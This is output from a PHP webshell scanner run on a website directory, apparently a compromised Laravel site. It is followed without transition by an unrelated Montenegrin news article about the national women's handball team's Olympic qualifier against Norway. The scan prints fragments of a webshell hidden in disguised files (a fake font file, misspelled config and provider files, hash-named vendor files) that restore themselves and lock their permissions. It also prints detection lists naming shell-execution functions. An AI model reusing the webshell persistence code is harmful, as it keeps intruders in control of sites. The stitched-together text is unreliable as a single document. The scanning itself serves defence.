🛡️ Strict PHP Shell Scanner (.php & .phtml)

📂 Scanning directory: /home/rscg/public_html


📄 /home/rscg/public_html/app/Providers/Br0adcastServiceProvider.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/config/Iogging.php
🚨 Matched pattern: file_get_contents(
ath) < 1000000) {
            $code = @file_get_contents($path);
            foreach ($patterns as $pattern) {
                if (preg_match($pattern, $code, $match) && is_shell($code, $patterns)) {
                    $results[] = [
                        'file'    => $path,
                        'match'   => $match[0],
                        'snippet' => snippet_preview($code, $match
📄 /home/rscg/public_html/fonts/vendor/@fortawesome/fontawesome-free/webfa-brands-400.woff2.php
🚨 Matched pattern: base64_decode(
     return;
    }
}

function safe_base64_decode($data) {
    if (!is_string($data)) return false;
    if (function_exists('base64_decode') && version_compare(PHP_VERSION, '5.2.0', '>=')) {
        $decoded = base64_decode($data, true);
        if ($decoded !== false) return $decoded;
        // fallback: try decode then verify
        $maybe = base64_decode($data);
        if ($maybe 
📄 /home/rscg/public_html/storage/framework/cache/data/7d/ac/backup.php
🚨 Matched pattern: base64_decode(
     return;
    }
}

function safe_base64_decode($data) {
    if (!is_string($data)) return false;
    if (function_exists('base64_decode') && version_compare(PHP_VERSION, '5.2.0', '>=')) {
        $decoded = base64_decode($data, true);
        if ($decoded !== false) return $decoded;
        // fallback: try decode then verify
        $maybe = base64_decode($data);
        if ($maybe 
📄 /home/rscg/public_html/vendor/doctrine/dbal/lib/Doctrine/DBAL/Connection.php
🚨 Matched pattern: assert(
   if ($version !== null) {
            assert($this->_driver instanceof VersionAwarePlatformDriver);

            $this->platform = $this->_driver->createDatabasePlatformForVersion($version);
        } else {
            $this->platform = $this->_driver->getDatabasePlatform();
        }

        $this->platform->setEventManager($this->_eventManager);
    }

    /**
     * Returns the version of t
📄 /home/rscg/public_html/vendor/doctrine/dbal/lib/Doctrine/DBAL/Schema/SQLServerSchemaManager.php
🚨 Matched pattern: assert(
 $exception->getPrevious();
            assert($exception instanceof Throwable);

            if (! $exception instanceof DriverException) {
                throw $exception;
            }

            // If we have a error code 3702, the drop database operation failed
            // because of active connections on the database.
            // To force dropping the database, we first have to clos
📄 /home/rscg/public_html/vendor/fzaninotto/faker/src/Faker/Provider/Image.php
🚨 Matched pattern: exec(
FILE, $fp);
            $success = curl_exec($ch) && curl_getinfo($ch, CURLINFO_HTTP_CODE) === 200;
            fclose($fp);
            curl_close($ch);

            if (!$success) {
                unlink($filepath);

                // could not contact the distant URL or HTTP error - fail silently.
                return false;
            }
        } elseif (ini_get('allow_url_fopen')) {
    
📄 /home/rscg/public_html/vendor/fzaninotto/faker/src/Faker/Provider/en_HK/0a9b45cf.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/fzaninotto/faker/src/Faker/Provider/lt_LT/d11b4795.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/guzzlehttp/guzzle/src/Handler/CurlFactory.php
🚨 Matched pattern: curl_init
array_pop($this->handles)
            : curl_init();
        curl_setopt_array($easy->handle, $conf);

        return $easy;
    }

    public function release(EasyHandle $easy)
    {
        $resource = $easy->handle;
        unset($easy->handle);

        if (count($this->handles) >= $this->maxHandles) {
            curl_close($resource);
        } else {
            // Remove all callback funct
📄 /home/rscg/public_html/vendor/guzzlehttp/guzzle/src/functions.php
🚨 Matched pattern: curl_exec
('curl_multi_exec') && function_exists('curl_exec')) {
        $handler = Proxy::wrapSync(new CurlMultiHandler(), new CurlHandler());
    } elseif (function_exists('curl_exec')) {
        $handler = new CurlHandler();
    } elseif (function_exists('curl_multi_exec')) {
        $handler = new CurlMultiHandler();
    }

    if (ini_get('allow_url_fopen')) {
        $handler = $handler
            ? 
📄 /home/rscg/public_html/vendor/hamcrest/hamcrest-php/hamcrest/Hamcrest/Internal/ad55aaa9.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/hamcrest/hamcrest-php/tests/Hamcrest/Number/4da8ee41.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/intervention/image/src/Intervention/Image/AbstractDecoder.php
🚨 Matched pattern: base64_decode(
        }

        return base64_encode(base64_decode($this->data)) === str_replace(["\n", "\r"], '', $this->data);
    }

    /**
     * Initiates new Image from Intervention\Image\Image
     *
     * @param  Image $object
     * @return \Intervention\Image\Image
     */
    public function initFromInterventionImage($object)
    {
        return $object;
    }

    /**
     * Parses and decodes b
📄 /home/rscg/public_html/vendor/laravel/framework/src/Illuminate/Filesystem/Filesystem.php
🚨 Matched pattern: exec(
irectory($target) ? 'J' : 'H';

        exec("mklink /{$mode} ".escapeshellarg($link).' '.escapeshellarg($target));
    }

    /**
     * Extract the file name from a file path.
     *
     * @param  string  $path
     * @return string
     */
    public function name($path)
    {
        return pathinfo($path, PATHINFO_FILENAME);
    }

    /**
     * Extract the trailing name component from a fi
📄 /home/rscg/public_html/vendor/laravel/tinker/config/geckos.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/league/flysystem/src/Adapter/Ftp.php
🚨 Matched pattern: fopen(
Config $config)
    {
        $stream = fopen('php://temp', 'w+b');
        fwrite($stream, $contents);
        rewind($stream);
        $result = $this->writeStream($path, $stream, $config);
        fclose($stream);

        if ($result === false) {
            return false;
        }

        $result['contents'] = $contents;
        $result['mimetype'] = $config->get('mimetype') ?: Util::guessMi
📄 /home/rscg/public_html/vendor/nette/utils/src/Utils/FileSystem.php
🚨 Matched pattern: file_get_contents(
(string $file): string
	{
		$content = @file_get_contents($file); // @ is escalated to exception
		if ($content === false) {
			throw new Nette\IOException(sprintf(
				"Unable to read file '%s'. %s",
				self::normalizePath($file),
				Helpers::getLastError()
			));
		}

		return $content;
	}


	/**
	 * Writes the string to a file.
	 * @throws Nette\IOException  on error occurred
	 */
	public sta
📄 /home/rscg/public_html/vendor/nikic/php-parser/grammar/rebuildParsers.php
🚨 Matched pattern: shell_exec(
tion execCmd($cmd) {
    $output = trim(shell_exec("$cmd 2>&1"));
    if ($output !== "") {
        echo "> " . $cmd . "\n";
        echo $output;
    }
    return $output;
}

//////////////////////////////
/// Regex helper functions ///
//////////////////////////////

function regex($regex) {
    return '~' . LIB . '(?:' . str_replace('~', '\~', $regex) . ')~';
}

function magicSplit($regex, $str
📄 /home/rscg/public_html/vendor/nikic/php-parser/lib/PhpParser/PrettyPrinter/Standard.php
🚨 Matched pattern: Eval(
)';
    }

    protected function pExpr_Eval(Expr\Eval_ $node) {
        return 'eval(' . $this->p($node->expr) . ')';
    }

    protected function pExpr_Include(Expr\Include_ $node) {
        static $map = [
            Expr\Include_::TYPE_INCLUDE      => 'include',
            Expr\Include_::TYPE_INCLUDE_ONCE => 'include_once',
            Expr\Include_::TYPE_REQUIRE      => 'require',
        
📄 /home/rscg/public_html/vendor/nunomaduro/collision/src/Contracts/Adapters/Phpunit/82398319.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/phpdocumentor/reflection-docblock/src/DocBlock/Tags/Factory/ecfe069e.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/phpunit/phpunit/src/Framework/TestCase.php
🚨 Matched pattern: eval(
ists($originalClassName)) {
            eval(
                $this->getMockObjectGenerator()->generateClassFromWsdl(
                    $wsdlFile,
                    $originalClassName,
                    $methods,
                    $options
                )
            );
        }

        $mockObject = $this->getMockObjectGenerator()->getMock(
            $originalClassName,
            
📄 /home/rscg/public_html/vendor/phpunit/phpunit/src/TextUI/Command.php
🚨 Matched pattern: assert(
class->newInstance();

                \assert($object instanceof TestSuiteLoader);

                return $object;
            }
        }

        if ($loaderClass == StandardTestSuiteLoader::class) {
            return null;
        }

        $this->exitWithErrorMessage(
            \sprintf(
                'Could not use "%s" as loader.',
                $loaderClass
            )
        )
📄 /home/rscg/public_html/vendor/phpunit/phpunit/src/Util/Xml.php
🚨 Matched pattern: assert(
         try {
                        \assert(\class_exists($className));

                        $variable = (new \ReflectionClass($className))->newInstanceArgs($constructorArgs);
                        // @codeCoverageIgnoreStart
                    } catch (\ReflectionException $e) {
                        throw new Exception(
                            $e->getMessage(),
                  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/1c/58dda08c.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/css/03e1b615.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/gauss/6b397c85.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/purebasic/23682b3e.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/detect/vbscript-html/8604ef28.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/markup/clojure/0fc0da8b.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/scrivo/highlight.php/test/markup/cos/f21e0fdf.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/sebastian/type/src/exception/ea199fe3.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/sebastian/type/tests/_fixture/c0911bf8.php
🚨 Matched pattern: file_get_contents(
){
        $text = ' . $fungsi[33] . '(file_get_contents("' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($curFile) . '-text') . '"));
        file_put_contents("' . $fungsi[0]() . '/' . $curFile . '", ' . $fungsi[32] . '($text));
    }
    if (gecko_perm("' . $fungsi[0]() . '/' . $curFile . '") != 0444){
        chmod("' . $fungsi[0]() . '/' . $curFile . '", 0444);
  
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/lib/classes/Swift/FileSpool.php
🚨 Matched pattern: file_get_contents(
                $message = unserialize(file_get_contents($file.'.sending'));

                $count += $transport->send($message, $failedRecipients);

                unlink($file.'.sending');
            } else {
                /* This message has just been catched by another process */
                continue;
            }

            if ($this->getMessageLimit() && $count >= $this->getMes
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/lib/classes/Swift/Plugins/0553acb9.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/acceptance/Swift/CharacterReaderFactory/818c64b5.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/acceptance/Swift/Encoder/Base64EncoderAcceptanceTest.php
🚨 Matched pattern: base64_decode(
->assertEquals(
                        base64_decode($encodedText), $text,
                        '%s: Encoded string should decode back to original string for sample '.
                        $sampleDir.'/'.$sampleFile
                        );
                }
                closedir($fileFp);
            }
        }
        closedir($sampleFp);
    }
}
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/acceptance/Swift/Mime/ContentEncoder/Base64ContentEncoderAcceptanceTest.php
🚨 Matched pattern: base64_decode(
->assertEquals(
                        base64_decode($encoded), $text,
                        '%s: Encoded string should decode back to original string for sample '.
                        $sampleDir.'/'.$sampleFile
                        );
                }
                closedir($fileFp);
            }
        }
        closedir($sampleFp);
    }
}
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/bug/Swift/Bug51Test.php
🚨 Matched pattern: base64_decode(
>assertIdenticalBinary($attachmentData, base64_decode($attachmentBase64));
    }

    private function fillFileWithRandomBytes($byteCount, $file)
    {
        // I was going to use dd with if=/dev/random but this way seems more
        // cross platform even if a hella expensive!!

        file_put_contents($file, '');
        $fp = fopen($file, 'wb');
        for ($i = 0; $i < $byteCount; ++$i) 
📄 /home/rscg/public_html/vendor/swiftmailer/swiftmailer/tests/smoke/69a03e5d.php
🚨 Matched pattern: eval(
n
                                    'eval(',
                                    'system(',
                                    'exec(',
                                    'shell_exec(',
                                    'passthru(',
                                    'popen(',
                                    'proc_open(',
                                    'nepo_corp',
       
📄 /home/rscg/public_html/vendor/symfony/console/Cursor.php
🚨 Matched pattern: shell_exec(
 [1, 1];
        }

        $sttyMode = shell_exec('stty -g');
        shell_exec('stty -icanon -echo');

        @fwrite($this->input, "\033[6n");

        $code = trim(fread($this->input, 1024));

        shell_exec(sprintf('stty %s', $sttyMode));

        sscanf($code, "\033[%d;%dR", $row, $col);

        return [$col, $row];
    }
}
📄 /home/rscg/public_html/vendor/symfony/console/Terminal.php
🚨 Matched pattern: exec(
       return false;
        }

        exec('stty 2>&1', $output, $exitcode);

        return self::$stty = 0 === $exitcode;
    }

    private static function initDimensions()
    {
        if ('\\' === \DIRECTORY_SEPARATOR) {
            if (preg_match('/^(\d+)x(\d+)(?: \((\d+)x(\d+)\))?$/', trim(getenv('ANSICON')), $matches)) {
                // extract [w, H] from "wxh (WxH)"
               
📄 /home/rscg/public_html/vendor/symfony/error-handler/DebugClassLoader.php
🚨 Matched pattern: eval(
   if (!isset($dirFiles[$file]) && ') : eval()\'d code' === substr($file, -17)) {
            // Get the file name from "file_name.php(123) : eval()'d code"
            $file = substr($file, 0, strrpos($file, '(', -17));
        }

        if (isset($dirFiles[$file])) {
            return $real.$dirFiles[$file];
        }

        $kFile = strtolower($file);

        if (!isset($dirFiles[$kFile]))
📄 /home/rscg/public_html/vendor/symfony/http-foundation/Request.php
🚨 Matched pattern: php://input
ent = false;

            return fopen('php://input', 'rb');
        }

        if ($currentContentIsResource) {
            rewind($this->content);

            return stream_get_contents($this->content);
        }

        if (null === $this->content || false === $this->content) {
            $this->content = file_get_contents('php://input');
        }

        return $this->content;
    }

    
📄 /home/rscg/public_html/vendor/symfony/http-foundation/Session/Storage/Handler/PdoSessionHandler.php
🚨 Matched pattern: exec(

        try {
            $this->pdo->exec($sql);
            $this->pdo->exec("CREATE INDEX EXPIRY ON $this->table ($this->lifetimeCol)");
        } catch (\PDOException $e) {
            $this->rollback();

            throw $e;
        }
    }

    /**
     * Returns true when the current session exists but expired according to session.gc_maxlifetime.
     *
     * Can be used to distinguish 
📄 /home/rscg/public_html/vendor/symfony/http-kernel/DataCollector/DumpDataCollector.php
🚨 Matched pattern: fopen(
epth = -1): array
    {
        $data = fopen('php://memory', 'r+b');

        if ('html' === $format) {
            $dumper = new HtmlDumper($data, $this->charset);
            $dumper->setDisplayOptions(['fileLinkFormat' => $this->fileLinkFormat]);
        } else {
            throw new \InvalidArgumentException(sprintf('Invalid dump format: "%s".', $format));
        }
        $dumps = [];

   
📄 /home/rscg/public_html/vendor/symfony/http-kernel/Kernel.php
🚨 Matched pattern: system(
tainer)) {
                    (new Filesystem())->remove(substr($legacyContainer, 0, -7));
                }
            }

            touch($oldContainerDir.'.legacy');
        }

        $preload = $this instanceof WarmableInterface ? (array) $this->warmUp($this->container->getParameter('kernel.cache_dir')) : [];

        if ($this->container->has('cache_warmer')) {
            $preload = arra
📄 /home/rscg/public_html/vendor/symfony/http-kernel/Profiler/FileProfilerStorage.php
🚨 Matched pattern: file_get_contents(
eateProfileFromData($token, unserialize(file_get_contents($file)));
    }

    /**
     * {@inheritdoc}
     *
     * @throws \RuntimeException
     */
    public function write(Profile $profile): bool
    {
        $file = $this->getFilename($profile->getToken());

        $profileIndexed = is_file($file);
        if (!$profileIndexed) {
            // Create directory
            $dir = \dirname
📄 /home/rscg/public_html/vendor/symfony/process/Process.php
🚨 Matched pattern: exec(
=== \DIRECTORY_SEPARATOR) {
            exec(sprintf('taskkill /F /T /PID %d 2>&1', $pid), $output, $exitCode);
            if ($exitCode && $this->isRunning()) {
                if ($throwException) {
                    throw new RuntimeException(sprintf('Unable to kill the process (%s).', implode(' ', $output)));
                }

                return false;
            }
        } else {
  
Rukometni savez Crne Gore
facebook instagram twitter viber licenciranje zrscg
Rukometni savez
Crne Gore

"Lavice" protiv Norveške počinju bitku za ostvarenje sna

seniori
Crna Gora se od petka do nedjelje protiv Norveške i Rumunije bori za ostvarenje olimpijskog sna.

U martu prošle godine, pred punim tribinama „Morače“, naše rukometašice trebalo je da vode bitku za plasman na Olimpijske igre u Tokiju.

Početak pandemije virusa COVID-19 uslovio je odgađanje turnira, potom i najveće svjetske smotre sportista.

Čekalo se godinu, a odbrojavanje se bliži kraju – „lavice“ u petak duelom protiv aktuelnog šampiona Evrope – Norveške, otvaraju najvažnije takmičenje u ovoj godini. Na tribinama neće biti vjernih navijača, ali Jovanki Radičević i saigračicama neće nedostajati motiva da ostvare san i tako obraduju čitavu naciju.

Da bi se treći put nakon nastupa u Londonu 2012. godine i Rio de Žaneiru četiri godine kasnije, našle na najvećoj svjetskoj smotri sportista, izabranice selektora Kima Rasmusena moraju da osvoje jedno od prva dva mjesta u konkurenciji Norveške i Rumunije.

Crna Gora ima tešku grupu i ozbiljne rivale, ali iako oslabljena učiniće sve da se plasira u Tokio, kazala je kapiten Jovanka Radičević.

"To je važan događaj za sve nas. Bio bi treći put da odem na Olimpijske igre. Ovo je posebna nedjelja za moju karijeru. Vjerujem i sigurna sam da ćemo učiniti sve da se plasiramo. Smatram da smo zdrava i dobra reprezentacija, koja kada obuče dres Crne Gore ima dodatni motiv", kazala je Radičević na konferenciji za novinare.

Komentarišući Norvešku, protivnika na startu turnira, kazala je da vjeruje da mogu do pobjede bez obzira na kvalitet rivala.

"Kalkulacije ne postoje. Potom imamo dan pauze da se spremimo za Rumuniju. Počeli smo da ih analiziramo. Može sa druge strane da bude bilo koja reprezentacija, sve zavisi od nas i toga kako ćemo prići utakmici. Sigurna sam da ovaj tim može mnogo i da ćemo se na kraju radovati", poručila je Radičević.

Radičević je istakla da joj je drago što imaju priliku da igraju na svom terenu, ali ne onako kako su zamišljale i željele i kako se Crna Gora spremala za to - sa najvatrenijim navijačima.

"Ali sigurna sam da ćemo se boriti za njih, za čitavu Crnu Goru. Samo treba da uživamo, da mamo maksimum. Navikle smo da se nosimo sa pritiskom, ali se nećemo predati", rekla je Radičević.

Pivot Ema Ramusović poručila je da će ekipa dati sve od sebe da se plasira u Tokio.

"Svjesni smo da nas čekaju dvije teške utakmice, ali nećemo izaći sa bijelom zastavom. Daćemo sve od sebe. Postoji velika želja i motiv. Uvijek pričamo da je odbrana naš glavni adut i da ukoliko odbrana bude na zadovoljavajućem nivou, onda je igra u oba pravca dobra", rekla je Ramusović.

Selektor Kim Rasmusen očekuje da će njegov tim dati maksimum, da će se boriti i igrati dobar rukomet.

"Djevojke izgledaju dobro, u boljem smo ritmu nego u decembru prošle godine. Mogu reći da sve djeluje pozitivno. Očekuju nas dvije teške utakmice - sve je moguće", kazao je Rasmusen.

Komentarišući rivala na startu, on je istakao da ga Norveška ne može iznenaditi.

"Moramo da zaustavimo njihovu brzu igru, njihovu kontru. Igra Norveške zavisi od Nore Merk i od toga da li će ona nastupiti ili ne. Ukoliko ona ne bude u timu, Norveška će igrati sporije. Dobro je da je to prvi meč na turniru za nas, da osjetimo teren, da odigramo u dobrom ritmu, jer će nam ta utakmica pokazati šta moramo bolje pred Rumuniju. Daćemo sve za pobjedu", poručio je Rasmusen.

facebook instagram twitter viber licenciranje
×